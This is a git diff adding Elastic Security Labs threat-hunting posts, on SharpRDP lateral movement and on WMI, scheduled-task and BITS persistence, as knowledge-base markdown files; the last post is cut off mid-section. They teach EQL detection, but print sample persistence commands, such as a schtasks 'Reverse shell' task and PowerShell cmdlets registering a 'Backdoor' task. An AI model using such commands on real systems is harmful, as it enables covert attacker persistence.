+## **Sharp Remote Desktop**
+
+[SharpRDP](https://posts.specterops.io/revisiting-remote-desktop-lateral-movement-8fb905cb46c3) is a Lateral Movement tool that leverages the Remote Desktop Protocol (RDP) for authenticated command execution and without the need for graphical interaction.
+
+Once authenticated, SharpRDP sends [virtual keystrokes](https://docs.microsoft.com/en-us/windows/win32/inputdev/virtual-key-codes) to the remote system via a method called [SendKeys](https://docs.microsoft.com/en-us/windows/win32/termserv/imsrdpclientnonscriptable-sendkeys) to open up a [Run dialog](https://www.groovypost.com/howto/howto/use-windows-key-r-run-as-administrator/) on the target host and then enter a specified command, which will be executed on the target host.
+
+The main indicator from the source host is an unusual process (hosting SharpRDP code) loading the Remote Desktop Services ActiveX Client that implements RDP client functionality (MsTscAx.dll) followed by an outbound network connection to RDP tcp port 3389 and both events from the same [process.entity_id](https://www.elastic.co/guide/en/ecs/current/ecs-process.html#field-process-entity-id):
+
+![26-suspicious-rdp-client-blog-hunting-lateral-movement.jpg](/assets/images/hunting-for-lateral-movement-using-event-query-language/26-suspicious-rdp-client-blog-hunting-lateral-movement.jpg)
+
+_Figure 26: Hunting EQL for suspicious RDP Client_
+
+Below an example of results matching our hunting EQL where we can see an unusual process (other than mstsc.exe and similar known RDP clients) loading the Remote Desktop Services ActiveX Client (MsTscAx.dll) as well as the outbound network connection:
+
+![27-results-example-blog-hunting-lateral-movement.jpg](/assets/images/hunting-for-lateral-movement-using-event-query-language/27-results-example-blog-hunting-lateral-movement.jpg)
+
+_Figure 27: Results example for suspicious RDP Client EQL hunt_
+
+On the target host, the following key events occur within a one-minute time window:
+
+1. An incoming network connection is accepted by the RDP service (TermService svchost.exe) on port 3389
+2. Under the [RunMRU](https://resources.infosecinstitute.com/topics/digital-forensics/understanding-critical-windows-artifacts-and-their-relevance-during-investigation-part-2/) registry key, a new (or update to an existing) string value is set to cmd, powershell, taskmgr or tsclient (depending on the chosen SharpRDP [execution method](https://github.com/0xthirteen/SharpRDP)), which is caused by the typed command in the [Run dialog](https://www.groovypost.com/howto/howto/use-windows-key-r-run-as-administrator/) via the [SendKeys](https://docs.microsoft.com/en-us/windows/win32/termserv/imsrdpclientnonscriptable-sendkeys) method
+3. Depending on the execution [method](https://github.com/0xthirteen/SharpRDP), a new process (attacker command) is created with [process.parent.name](https://www.elastic.co/guide/en/ecs/current/ecs-process.html) of cmd.exe, powershell.exe, taskmgr.exe, or a random executable running from the [tsclient](https://www.virtualizationhowto.com/2016/07/map-network-drive-remote-desktop-local-computer/) mountpoint (shared drive from the RDP client host with the RDP target server)
+
+For (2), note that when running anything from the [Run dialog](https://www.groovypost.com/howto/howto/use-windows-key-r-run-as-administrator/), a registry entry will be created at HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU showing what was entered into the [Run dialog](https://www.groovypost.com/howto/howto/use-windows-key-r-run-as-administrator/) box.
+
+The above [sequence](https://www.elastic.co/guide/en/elasticsearch/reference/current/eql-syntax.html#eql-sequences) of events can be expressed with the following [EQL](https://www.elastic.co/guide/en/elasticsearch/reference/master/eql.html):
+
+![28-sharprdp-blog-hunting-lateral-movement.jpg](/assets/images/hunting-for-lateral-movement-using-event-query-language/28-sharprdp-blog-hunting-lateral-movement.jpg)
+
+_Figure 28: Hunting EQL for SharpRDP behavior on the target host_
+
+Example of a detection alert and its composing event details on the target host:
+
+![29-detection-alert-blog-hunting-lateral-movement.jpg](/assets/images/hunting-for-lateral-movement-using-event-query-language/29-detection-alert-blog-hunting-lateral-movement.jpg)
+
+_Figure 29: Detection alert for SharpRDP on target host (TermService network connection)_
+
+![30-target-host-blog-hunting-lateral-movement.jpg](/assets/images/hunting-for-lateral-movement-using-event-query-language/30-target-host-blog-hunting-lateral-movement.jpg)
+
+_Figure 30: Detection alert for SharpRDP on target host (RunMRU set to Powershell)_
+
+![31-powershell-child-process-blog-hunting-lateral-movement.jpg](/assets/images/hunting-for-lateral-movement-using-event-query-language/31-powershell-child-process-blog-hunting-lateral-movement.jpg)
+
+_Figure 31: Detection alert for SharpRDP on target host (PowerShell child process)_
+
+## **Wrapping up**
+
+[Event Query Language (EQL)](https://www.elastic.co/guide/en/elasticsearch/reference/master/eql.html) correlation capabilities enable us to capture complex behavior for a variety of Lateral Movement techniques. The high-level steps are:
+
+1. **Understand the theory** and the building blocks of a certain technique (network protocols, loaded modules, services, process names, and arguments)
+2. **Identify the key events** and their order that compose a certain behavior (both source and target host)
+3. **Identify the common values** that can be used for correlation ([sequences](https://www.elastic.co/guide/en/elasticsearch/reference/current/eql-syntax.html#eql-sequences)) — identifying more commonalities can reduce false positives
+4. **Identify enrichment possibilities** , such as extra events in the sequence that can be useful during alert triage
+5. **Assess the window of time** for correlation — using a shorter time window (for example, 30 seconds instead of 1 second) can reduce false positives, but can also introduce false negatives caused by network latency or slow system
+6. **Test using different methods and tools** and tune the hunting logic accordingly, or, in some instances, duplicate logic to capture edge cases
+
+Some of the [EQL](https://www.elastic.co/guide/en/elasticsearch/reference/master/eql.html) detection rules used as examples can be found in the [Elastic detection-rules](https://github.com/elastic/detection-rules)repository:
+
+- [Remote File Copy to a Hidden Share](https://github.com/elastic/detection-rules/blob/main/rules/windows/lateral_movement_remote_file_copy_hidden_share.toml)
+- [Lateral Tool Transfer](https://github.com/elastic/detection-rules/blob/main/rules/windows/lateral_movement_executable_tool_transfer_smb.toml)
+- [Remote Execution via File Shares](https://github.com/elastic/detection-rules/blob/main/rules/windows/lateral_movement_execution_via_file_shares_sequence.toml)
+- [Lateral Movement via Startup Folder](https://github.com/elastic/detection-rules/blob/main/rules/windows/lateral_movement_via_startup_folder_rdp_smb.toml)
+- [Outbound Scheduled Task Activity via PowerShell](https://github.com/elastic/detection-rules/blob/main/rules/windows/execution_scheduled_task_powershell_source.toml)
+- [Remote Scheduled Task Creation](https://github.com/elastic/detection-rules/blob/main/rules/windows/lateral_movement_scheduled_task_target.toml)
+- [Potential SharpRDP Behavior](https://github.com/elastic/detection-rules/blob/main/rules/windows/lateral_movement_rdp_sharprdp_target.toml)
+- [Suspicious RDP ActiveX Client Loaded](https://github.com/elastic/detection-rules/blob/main/rules/windows/lateral_movement_suspicious_rdp_client_imageload.toml)
+- [Execution via TSClient Mountpoint](https://github.com/elastic/detection-rules/blob/main/rules/windows/lateral_movement_execution_from_tsclient_mup.toml)
+
+If you’re new to [Elastic Security](https://www.elastic.co/security), you can experience our latest version on [Elasticsearch Service](https://www.elastic.co/elasticsearch/service) on Elastic Cloud.
diff --git a/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/hunting_for_persistence_using_elastic_security_part_1.md b/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/hunting_for_persistence_using_elastic_security_part_1.md
new file mode 100644
index 0000000000000..4d2eade3b7843
--- /dev/null
+++ b/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/hunting_for_persistence_using_elastic_security_part_1.md
@@ -0,0 +1,150 @@
+---
+title: "Adversary tradecraft 101: Hunting for persistence using Elastic Security (Part 1)"
+slug: "hunting-for-persistence-using-elastic-security-part-1"
+date: "2022-06-01"
+description: "Learn how Elastic Endpoint Security and Elastic SIEM can be used to hunt for and detect malicious persistence techniques at scale."
+author:
+  - slug: david-french
+  - slug: brent-murphy
+  - slug: elastic-security-intelligence-analytics-team
+image: "blog-thumb-security-breach-red-lock.jpg"
+category:
+  - slug: adversary
+---
+
+Last month, we hosted a webinar, [Hunting for persistence using Elastic Security](https://www.elastic.co/webinars/hunting-for-persistence-using-elastic-security), where we examined some techniques that attackers use in the wild to maintain presence in their victim’s environment. For each technique covered, we explained:
+
+- How the offensive technique works
+- Why the technique is often successful for attackers
+- How defenders can hunt for and detect the malicious behavior effectively using [Elastic Security](https://www.elastic.co/security)
+
+In this two-part blog series, we’ll share the details of what was covered during our webinar with the goal of helping security practitioners improve their visibility of these offensive persistence techniques and help to undermine the efficacy of these attacks against their organization.
+
+Part 1 will explain what persistence is and why attackers need it. We’ll introduce the Event Query Language (EQL) before showing its practical use cases for threat hunting. We will examine a popular technique used by adversaries to maintain persistence, Windows Management Instrumentation (WMI) Event Subscription ([T1084](https://attack.mitre.org/techniques/T1084/)). We’ll also share how Elastic Security users can hunt for and detect this technique being used in their environment.
+
+In part 2, we’ll explore two additional persistence techniques that are being used by attackers in the wild: BITS Jobs ([T1197](https://attack.mitre.org/techniques/T1197/)) and Scheduled Tasks ([T1053](https://attack.mitre.org/techniques/T1053/)). This follow-up post will walk through real world examples of these techniques being used and how we can hunt for, detect, and prevent them using Elastic Security.
+
+The Protections team at Elastic Security is responsible for researching, understanding, and developing detections and preventions for attacker behavior in order to stop attacks before damage or loss occur. For organizations that do not have a full-time security operations team, Elastic Security includes out-of-the-box protections against adversary tradecraft, malware, and attacks like ransomware and phishing.
+
+## What is persistence and why do attackers need it?
+
+When we consider the common components of an intrusion, such as those depicted in Figure 1, the attacker may have spent a considerable amount of effort carrying out reconnaissance, obtaining initial access to, and establishing a foothold in their target environment. Generally speaking, an adversary will often want to maintain a presence in order to survive disruptions to their access like system restarts or user password changes. An effective persistence mechanism will execute the attacker’s malicious code on a regular basis or when a specific condition is met such as a user logon or application launch event.
+
+In many cases, gaining access to an organization’s network is harder than maintaining persistence. It is for this reason that attackers continue to use the persistence techniques covered in this post — with largely successful results. When the security industry refers to “dwell time,” that's the period of time that begins when an adversary gains access to a system and ends when you detect them. Persistence facilitates longer dwell times, during which the adversary can work to achieve their objectives.
+
+![Figure 1 - FireEye Mandiant’s Cyber Attack Lifecycle](/assets/images/hunting-for-persistence-using-elastic-security-part-1/adversary-tradecraft-101-part-1-image1.jpg)
+
+There are currently [63 persistence techniques](https://attack.mitre.org/tactics/TA0003/) documented in the [MITRE ATT&CK®](https://attack.mitre.org/) knowledge base of adversary behavior. This number can seem daunting at first, but an adversary’s need for persistence can be their Achilles’ heel, providing defenders with valuable opportunities to detect and remove an attacker from their environment.
+
+By learning these offensive tactics, techniques, and procedures (TTPs) and baselining the endpoints and network activity in your environment, you have an opportunity to detect attackers early on in an intrusion before any damage or loss occurs. Security operations teams work tirelessly to detect the techniques captured in the ATT&CK matrix — hunting and writing alert logic to provide the greatest visibility and coverage of their enterprise. To help reduce the barrier to entry and enable those teams, we created EQL and released it to the community.
+
+## What is Event Query Language (EQL)?
+
+The queries in this blog post, which can be used for threat hunting and detection, are written in EQL — a powerful and intuitive query language that makes it easy for practitioners to search for complex adversary behavior.
+
+To learn more about EQL, you can read the [Getting started with EQL](https://www.elastic.co/blog/getting-started-eql) blog post or review the [EQL Analytics Library](https://eqllib.readthedocs.io/en/latest/analytics.html), which contains 200+ free security analytics mapped to the techniques documented in the MITRE ATT&CK matrix. EQL is a core component of Elastic Endpoint Security and [is being added to Elasticsearch](https://github.com/elastic/elasticsearch/issues/49581) for use in Elastic SIEM.
+
+Let’s now analyze the WMI Event Subscription technique used by attackers in the wild by demonstrating a variety of methods to hunt for and detect this technique. We decided to cover this technique given its popularity among attackers and the low detection rates by traditional security controls.
+
+## Persistence via Windows Management Instrumentation (WMI) Event Subscriptions (T1084)
+
+[WMI](https://docs.microsoft.com/en-us/windows/win32/wmisdk/about-wmi) is the Microsoft implementation of Web-Based Enterprise Management (WBEM), a collection of technologies used to manage information and systems in enterprise environments. WMI is a built-in feature of Windows endpoints that allows both administrators and attackers to interact and manage many different functions of the operating system. Components such as network interfaces, power settings, service status, and installed software or patches can all be queried and managed via WMI.
+
+Attackers have been abusing WMI since as early as 2008 to accomplish different objectives such as moving laterally between endpoints, enumerating what processes are running on an endpoint, and to maintain persistence. An attacker can “live off the land” by abusing built-in features of the operating system, which often results in a lower risk of detection than if they introduced malware into a victim environment.
+
+It's no secret that adversaries prefer WMI-based persistence because:
+
+- Many organizations are incapable of monitoring or investigating WMI
+- Out-of-the-box WMI visibility is limited, and a third-party utility may be required to effectively convey how WMI is being used
+- WMI is an integral component of Windows, and the volume of weak signals from this data source can overwhelm analysts who aren't familiar with these attack types
+
+Like most offensive techniques, until organizations can reliably detect WMI abuse, the adversary is unlikely to change their behavior.
+
+### Understanding WMI Event Subscriptions and how they can be abused
+
+Simply put, a WMI Event Subscription can trigger an action when a certain condition is met. A WMI Event Subscription consists of three components.
+
+- EventFilter - specifies a condition that you test for, i.e. a user successfully authenticates, a particular time and day of the week occurs, etc.
+- EventConsumer - specifies an action to execute when the EventFilter condition is met, i.e. execute a Windows command or script, delete all Volume Shadow Copies, restart a service, etc.
+- FilterToConsumerBinding - this links an EventFilter to an EventConsumer instance
+
+Figure 2 below shows the output from Sysinternals Autoruns, a free tool from Microsoft that can be used to examine various persistence locations on Windows endpoints, also referred to as Autostart Execution Points (ASEPs). Autoruns reveals a persistent WMI Event Subscription, named checkforupdates. It is important to note that there are sometimes benign WMI Event Subscriptions configured, but there shouldn’t be many. Alerting on the creation of new WMI Event Subscriptions and hunting for new ones periodically can be a low cost, high reward exercise.
+
+![Figure 2 - Autoruns showing a WMI Event Subscription registered by Empire](/assets/images/hunting-for-persistence-using-elastic-security-part-1/adversary-tradecraft-101-part-1-image2.jpg)
+
+The full WMI Query Language (WQL) query from the Autoruns results is shown below. Autoruns conveniently enumerated the WMI \_\_EventFilter class for us in the root\Subscription namespace where this malicious entry was created. Interpreting this WQL query, the EventFilter condition will be met when the system’s uptime is between 240 -325 seconds. The EventConsumer is an [Empire](https://github.com/EmpireProject/Empire) PowerShell script and will execute when this EventFilter condition is met.
+
+To summarize, a WMI Event Subscription has been configured to execute a malicious PowerShell script shortly after the endpoint boots up. This enables the attacker to maintain persistence in the victim’s environment and survive system restarts.
+
+```
+SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System' AND
+TargetInstance.SystemUpTime >= 240 AND
+TargetInstance.SystemUpTime < 325
+```
+
+_Figure 3 - WMI Query Language (WQL) query showing WMI EventFilter condition_
+
+### Hunting for and detecting malicious WMI Event Subscriptions
+
+The EQL query in Figure 4 shows how we can search for a sequence of three WMI events, which were generated by the same unique process ID (PID). This query demonstrates one of the strengths of EQL by using the join function. This allows us to match sequences of events in any order. Searching for these three WMI events without binding them together by unique PID might not return meaningful results. This query matches when a WMI EventFilter, EventConsumer, and FilterToConsumer binding are created by the same process in succession, which typically occurs when malware is executed and creates a new WMI Event Subscription for persistence. This query can be used to monitor for and detect abuse of WMI.
+
+```
+join by unique_pid
+  [wmi where properties.Operation == "*IWbemServices::PutInstance*EventFilter*"]
+  [wmi where properties.Operation == "*IWbemServices::PutInstance*EventConsumer*"]
+  [wmi where properties.Operation == "*IWbemServices::PutInstance*FilterToConsumerBinding*"]
+```
+
+_Figure 4 - EQL query to search for the creation of a WMI EventFilter, EventConsumer, and FilterToConsumerBinding in succession_
+
+The above EQL query can be saved as a custom rule in Elastic Endpoint Security so that analysts can be alerted every time a new WMI Event Subscription is created by a process (Figure 5).
+
+![Figure 5 - Alert created by custom rule in Elastic Endpoint Security](/assets/images/hunting-for-persistence-using-elastic-security-part-1/adversary-tradecraft-101-part-1-image3.png)
+
+Resolver is the primary interface for interacting with alerts in Elastic Endpoint Security and enables users to visualize process ancestry along with relevant events such as DNS, file, network, WMI, and PowerShell, to name a few. It also provides one-click response actions to resolve the alert.
+
+![Figure 6 - Resolver showing process ancestry and events created by powershell.exe](/assets/images/hunting-for-persistence-using-elastic-security-part-1/adversary-tradecraft-101-part-1-image4.jpg)
+
+Clicking the WMI event type next to powershell.exe in Resolver enables users to review the WMI events that were generated by the process. Figure 7 shows the WMI event that was logged when powershell.exe was used to create the new WMI FilterToConsumerBinding, checkforupdates.
+
+![Figure 7 - WMI event created by powershell.exe](/assets/images/hunting-for-persistence-using-elastic-security-part-1/adversary-tradecraft-101-part-1-image5.jpg)
+
+Elastic Endpoint Security also includes template-based hunts that lower the barriers to entry for less experienced analysts and allows for the easy collection and analysis of data across an organization’s endpoints. There are currently 25 categories of persistence data that can be collected and analyzed using template-based hunts.
+
+![Figure 8 - Hunting for persistence using Elastic Endpoint’s template-based hunts](/assets/images/hunting-for-persistence-using-elastic-security-part-1/adversary-tradecraft-101-part-1-image6.jpg)
+
+Once a hunt has been executed, there are several ways to sort or aggregate the data — such as by frequency or file path. This helps analysts to quickly baseline their endpoints and identify anomalies to investigate further.
+
+Figure 9 depicts the filtered results of a persistence hunt wherein the same malicious WMI Event Subscription was configured. Elastic Security enumerates persistence locations across your endpoints and enables users to apply filters to identify anomalies or suspicious artifacts for further analysis. Hunt teams will often assume that traditional passive and reactive security controls are fallible, and will proactively hunt for malicious persistence mechanisms in search for attackers operating in their environment.
+
+![Figure 9 - Results of an Elastic Endpoint hunt showing malicious WMI persistence](/assets/images/hunting-for-persistence-using-elastic-security-part-1/adversary-tradecraft-101-part-1-image7.png)
+
+Elastic Security comes with out-of-the-box detections for WMI abuse. Figure 10 shows the signal that was generated by Elastic Endpoint and shipped to Elastic SIEM when a malicious WMI Event Subscription was created.
+
+![Figure 10 - Elastic Endpoint signal shown in Elastic SIEM](/assets/images/hunting-for-persistence-using-elastic-security-part-1/adversary-tradecraft-101-part-1-image8.png)
+
+Users have the option to view a signal in the Timeline within Elastic SIEM. Timeline enables analysts to search for similar activity across their data, gather and document evidence, and forward potential incidents to ticketing and SOAR platforms with ease. Part 2 of this series will show the workflow and features of Timeline.
+
+![Figure 11 - Option to view signal in Timeline in Elastic SIEM](/assets/images/hunting-for-persistence-using-elastic-security-part-1/adversary-tradecraft-101-part-1-image9.jpg)
+
+As of version 7.6 of the Elastic Stack, the SIEM app comes with a detection engine, which enables security teams to create their own custom rules. For example, Windows 10 logs Event ID 5861 when a new WMI EventFilterToConsumer binding is created. Figure 12 shows how a custom rule can be created in Elastic SIEM to search the winlogbeat-\* index pattern for winlog.record_id: 5861. We can configure a description, severity, and risk score for the new rule, as well as map the rule to the relevant techniques in the MITRE ATT&CK matrix. This information will help an analyst triage and determine the steps to take when the rule condition occurs.
+
+![Figure 12 - Example of a new rule being created in Elastic SIEM](/assets/images/hunting-for-persistence-using-elastic-security-part-1/adversary-tradecraft-101-part-1-image10.png)
+
+Elastic SIEM is part of the Basic subscription and currently includes 92 detections that utilize Windows, Linux, network, and APM logging. We will continue to add new rules in new releases of the Elastic Stack.
+
+![Figure 13 - Detection rules view in Elastic SIEM](/assets/images/hunting-for-persistence-using-elastic-security-part-1/adversary-tradecraft-101-part-1-image11.png)
+
+In this section, we learned how WMI Event Subscriptions can be abused for persistence and how we can hunt for and detect this technique using the combination of Elastic Endpoint and SIEM. It’s important to note that we have only scratched the surface of how WMI works and the many ways that it can be used by attackers.
+
+WMI can be used during every phase of an attack, such as moving laterally between endpoints, conducting local and enterprise reconnaissance, and stealing data. Elastic Security has released detections for many techniques that leverage WMI.
+
+## Conclusion
+
+In this blog post, we examined a popular technique that attackers use to maintain a presence in their target environments. The number of techniques in an attacker’s arsenal can seem daunting at first, but we demonstrated a formulaic approach to examining, hunting for, and detecting techniques effectively. By building comprehension around adversary tradecraft, you can identify interesting patterns, behaviors, and artifacts that you can use to your advantage.
+
+Elastic Security makes hunting for persistence easy. The features of Elastic Endpoint Security and SIEM (along with the protections provided out of the box) lower the barriers to entry for analysts, provide detailed visibility into endpoint activity, and enable organizations to prevent, detect, and respond to malicious behavior at scale.
+
+To learn more about threat hunting, download a free copy of [The Elastic Guide to Threat Hunting](https://ela.st/threat-hunting).
+
+Plus, [EQL support is being added to Elasticsearch](https://github.com/elastic/elasticsearch/issues/49581)!
diff --git a/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/hunting_for_persistence_using_elastic_security_part_2.md b/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/hunting_for_persistence_using_elastic_security_part_2.md
new file mode 100644
index 0000000000000..dc7e1f702d056
--- /dev/null
+++ b/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/hunting_for_persistence_using_elastic_security_part_2.md
@@ -0,0 +1,216 @@
+---
+title: "Adversary tradecraft 101: Hunting for persistence using Elastic Security (Part 2)"
+slug: "hunting-for-persistence-using-elastic-security-part-2"
+date: "2022-06-21"
+description: "Learn how Elastic Endpoint Security and Elastic SIEM can be used to hunt for and detect malicious persistence techniques at scale."
+author:
+  - slug: brent-murphy
+  - slug: david-french
+  - slug: elastic-security-intelligence-analytics-team
+image: "blog-thumb-shattered-lock.jpg"
+category:
+  - slug: adversary
+---
+
+In Part 2 of this two-part series, our goal is to provide security practitioners with better visibility, knowledge, and capabilities relative to malicious persistence techniques that impact organizations around the world every day.
+
+[Part 1](https://www.elastic.co/blog/hunting-for-persistence-using-elastic-security-part-1) explained what persistence is and why attackers need it. It introduced the Event Query Language ([EQL](https://www.elastic.co/blog/getting-started-eql)) before showing its practical use cases for threat hunting. Finally, it examined a popular technique used by adversaries to maintain persistence, Windows Management Instrumentation (WMI) Event Subscription ([T1084](https://attack.mitre.org/techniques/T1084/)). We shared how [Elastic Security](https://www.elastic.co/security) users can hunt for and detect this technique being used in their environment.
+
+In this post, we’ll explore two additional persistence techniques that are being used by attackers in the wild: Scheduled Tasks ([T1053](https://attack.mitre.org/techniques/T1053/)) and BITS Jobs ([T1197](https://attack.mitre.org/techniques/T1197/)). This blog assumes you've already learned a little EQL as we walk through real-world examples and provide ready-to-use detection logic for each technique.
+
+## Persistence via scheduled tasks (T1053)
+
+Windows provides a built-in utility called schtasks.exe that allows you to create, delete, change, run, and end tasks on a local or remote computer. Scheduled tasks run at an elevated privilege level, which means this persistence mechanism can indirectly satisfy privilege escalation (TA0004) as well. It’s important to be aware of scheduled tasks that exist in your environment (such as maintenance or backup tasks) as well as tasks created during the installation of new software (like PDF readers or browsers). It's also essential for security teams to baseline their environment, as knowing all the legitimate ways that scheduled tasks are used will help you become a more effective hunter and identify anomalies more quickly.
+
+An adversary may attempt to abuse scheduled tasks to execute programs at startup or on a regular cadence for persistence. Threat actors like [APT34](https://attack.mitre.org/groups/G0049/), [APT29](https://attack.mitre.org/groups/G0016/), and [FIN6](https://attack.mitre.org/groups/G0037/) have been known to use scheduled tasks as a means to persist. Figure 1 depicts some of the command line parameters available to schtasks.exe, which we can use as references when analyzing task creation events.
+
+```
+/Create - creates a new scheduled task
+/RU - specifies the "run as" user account
+/SC - specifies the schedule frequency
+/TN - specifies the string in the form of path\name which uniquely identifies this scheduled task
+/TR - specifies the path and file name of the program to be run at the scheduled time
+/MO - specifies how often the task runs within its schedule type
+/F - forcefully creates the task and suppresses warnings if the specified task already exists
+```
+
+_Figure 1 - Portion of Windows schtasks.exe available command line parameters_
+
+Figure 2 shows an example of a schtasks.exe command. [This example](https://lolbas-project.github.io/lolbas/Binaries/Schtasks/) is from the popular [Living Off The Land Binaries and Scripts (LOLBAS)](https://lolbas-project.github.io/) project that demonstrates how built-in, trusted Operating System utilities can be abused by adversaries to achieve their objectives. By looking at the command line parameters in the example, the task named Reverse Shell is configured to execute the binary C:\some\directory\revshell.exe every minute.
+
+```
+schtasks /create /sc minute /mo 1 /tn "Reverse shell" /tr C:\some\directory\revshell.exe /create /sc minute /mo 1 /tn "Reverse shell" /tr C:\some\directory\revshell.exe
+```
+
+_Figure 2 - Example of scheduled task creation using schtasks.exe_
+
+Windows PowerShell also includes several [ScheduledTasks cmdlets](https://docs.microsoft.com/en-us/powershell/module/scheduledtasks/?view=win10-ps) that can be used to create and manage scheduled tasks on Windows endpoints. Security teams can hunt for suspicious usage of these cmdlets including the ones listed in Figure 3. Organizations that have already deployed PowerShell 5.0 should consider monitoring suspicious script block logging events, Event ID 4104. A good resource on PowerShell visibility and recommended log sources to monitor can be found [here](https://www.fireeye.com/blog/threat-research/2016/02/greater_visibilityt.html).
+
+```
+New-ScheduledTaskAction - creates a scheduled task action
+New-ScheduledTaskTrigger - creates a scheduled task trigger object
+Register-ScheduledTask - registers a scheduled task definition on a local computer
+```
+
+_Figure 3 - Common PowerShell cmdlets for scheduled task creations_
+
+Figure 4 shows how these PowerShell cmdlets can be used to create and register a scheduled task.
+
+```
+PS C:\> $A = New-ScheduledTaskAction -Execute "cmd.exe" -Argument "/c C:\Windows\Temp\backdoor.exe"
+PS C:\> $T = New-ScheduledTaskTrigger -Daily -At 9am
+PS C:\> $D = New-ScheduledTask -Action $A -Trigger $T
+PS C:\> Register-ScheduledTask Backdoor -InputObject $D
+```
+
+_Figure 4 - PowerShell cmdlets being used to create and register a scheduled task_
+
+## Real-world example: APT34 scheduled tasks abuse
+
+As mentioned previously, APT34, a highly organized and technical state-sponsored threat group, is known to use scheduled tasks for persistence. The following visualization (Figure 5) depicts one of the ways a scheduled task can be used. In this case, we’re seeing the result of a victim opening a phishing lure (Step 1) — attributed to the APT34 threat group — via the Resolver view. Resolver is a critical enabler for security practitioners, as discussed in [Part 1](https://www.elastic.co/security-labs/hunting-for-persistence-using-elastic-security-part-1). In this example, the following behaviors can be observed:
+
+- A malicious macro, embedded within a Microsoft Word document, was opened (Step 2)
+- Upon opening the Word document and executing the malicious macro, the native Windows script interpreter (wscript.exe) executed a script introduced by the adversary (Step 3)
+- The script created a callback to C2 while also establishing persistence via a scheduled task (Step 4)
+
+![Figure 5 - Elastic Endpoint Security’s Resolver view showing process ancestry after a user opened a malicious Word document, leading to the configuration of a persistent scheduled task](/assets/images/hunting-for-persistence-using-elastic-security-part-2/adversary-tradecraft-101-part-2-image1.jpg)
+
+Figure 6 depicts the command line arguments parsed from the malicious scheduled task. Every minute, the native Windows Script Host utility, wscript.exe, will execute the malicious VBScript file, AppPool.vbs, which resides in the ProgramData subdirectory.
+
+![Figure 6 - Resolver showing command line arguments executed with schtasks.exe](/assets/images/hunting-for-persistence-using-elastic-security-part-2/adversary-tradecraft-101-part-2-image2.png)
+
+## Hunting for scheduled tasks
+
+With an understanding of the technique, observable artifacts, and common attributes of schtasks.exe execution, we're better prepared to succeed in our hunt for malicious scheduled task creation events. The EQL query in Figure 7 matches event sequences where the task scheduler process, schtasks.exe, is created by one of several commonly abused binaries and matches some of the command line parameters previously described. By uniquing on the command line, this allows us to focus our hunt on unique task creations and their properties.
+
+This query matches behaviors described in our earlier APT34 example, in which schtasks.exe descended from wscript.exe. Windows script host (WSH) is a script interpreter and should generally not have many descendants. In this case, it indicates that WSH was used to interpret a JScript or VBScript object that directly or by proxy implemented a scheduled task using schtasks.exe. This EQL query can also be saved as a custom rule in Elastic Endpoint Security so that analysts can be alerted every time this activity occurs.
+
+```
+process where subtype.create and
+ process_name == "schtasks.exe" and
+  descendant of
+   [process where process_name in ("cmd.exe", "wscript.exe", "rundll32.exe", "regsvr32.exe",
+    "wmic.exe", "mshta.exe","powershell.exe")] and
+   command_line == "* /create*" and
+   wildcard(command_line, "*/RU*", "*/SC*", "*/TN*", "*/TR*", "*/F*")
+| unique command_line
+```
+
+_Figure 7 - EQL query to search for the creation of schtasks.exe as a descendant of commonly abused processes_
+
+In [Elastic SIEM](https://www.elastic.co/siem), we can search for the use of the scheduled tasks utility and drag and drop fields of interest into the responsive Timeline (Figure 8) for further investigation. Data from multiple indices, or data sources, can be added to the [Timeline](https://www.elastic.co/guide/en/siem/guide/current/siem-ui-overview.html) view, which enables analysts to organize leads and investigate complex threats. [Version 7.6](https://www.elastic.co/blog/elastic-stack-7-6-0-released) introduced a detection engine that included 92 out-of-the-box rules for detection in Windows, Linux, network, and APM telemetry — as well as enabling users to create their own custom rules.
+
+![Figure 8 - Using Timeline in Elastic SIEM to investigate schtasks.exe creation events](/assets/images/hunting-for-persistence-using-elastic-security-part-2/Timeline2.gif)
+
+## Other scheduled task considerations
+
+Scheduled tasks may not seem sophisticated, but they are a great example of how hunters must understand the various ways that an adversary can schedule a task on a system. When shallowly monitoring a technique (i.e., only looking for use of schtasks.exe), a team can easily lull itself into a false sense of security. Understanding adversary tradecraft and having access to the relevant telemetry is crucial for successful threat hunting.
+
+It’s important to note that there are many other ways scheduled tasks can be abused by adversaries, including offensive security tools, custom scripts, .job files, the AT command, and directly via the [Task Scheduler API](https://docs.microsoft.com/en-us/windows/win32/taskschd/task-scheduler-reference). Elastic Security provides detections and preventions for various TTPs related to scheduled task abuse and provides API-level visibility.
+
+In the next section, we’ll analyze BITS jobs, how they are used by attackers in the wild, and a variety of methods to identify or detect this technique.
+
+## Persistence via BITS jobs (T1197)
+
+Windows [Background Intelligent Transfer Service (BITS)](https://docs.microsoft.com/en-us/windows/win32/bits/background-intelligent-transfer-service-portal) is a built-in framework used to transfer files to and from web and SMB servers. Microsoft provides a utility called bitsadmin.exe and PowerShell cmdlets for managing the transfer of files.
+
+Microsoft uses BITS to download and install updates in the background — using idle bandwidth. For example, if a user starts a Windows Update and signs out of the computer, or if a network connection is lost, BITS will resume the download automatically as soon as it is able. The capability to survive reboots makes it an ideal tool for attackers to transfer malicious files and possibly large volumes of data the actor plans to steal. Threat groups like [APT40](https://attack.mitre.org/groups/G0065/) and malware families such as the Qbot banking trojan have used BITS to transfer malicious files and set up persistence.
+
+Figure 9 shows some [parameters](https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/bitsadmin) that can be used with bitsadmin.exe. We can identify interesting activity by focusing on creation and transfer command line options.
+
+```
+/create - creates a transfer job with the given display name
+/addfile - adds a file to the specified job
+/resume - activates a new or suspended job in the transfer queue
+/transfer - transfers one or more files
+/SetNotifyCmdLine - sets the command that will run when the job finishes transferring data or when a job enters a state
+/SetMinRetryDelay - sets the minimum length of time, in seconds, that BITS waits after encountering a transient error before trying to transfer the file
+```
+
+_Figure 9 - Parameters that can be used with the Windows bitsadmin.exe utility_
+
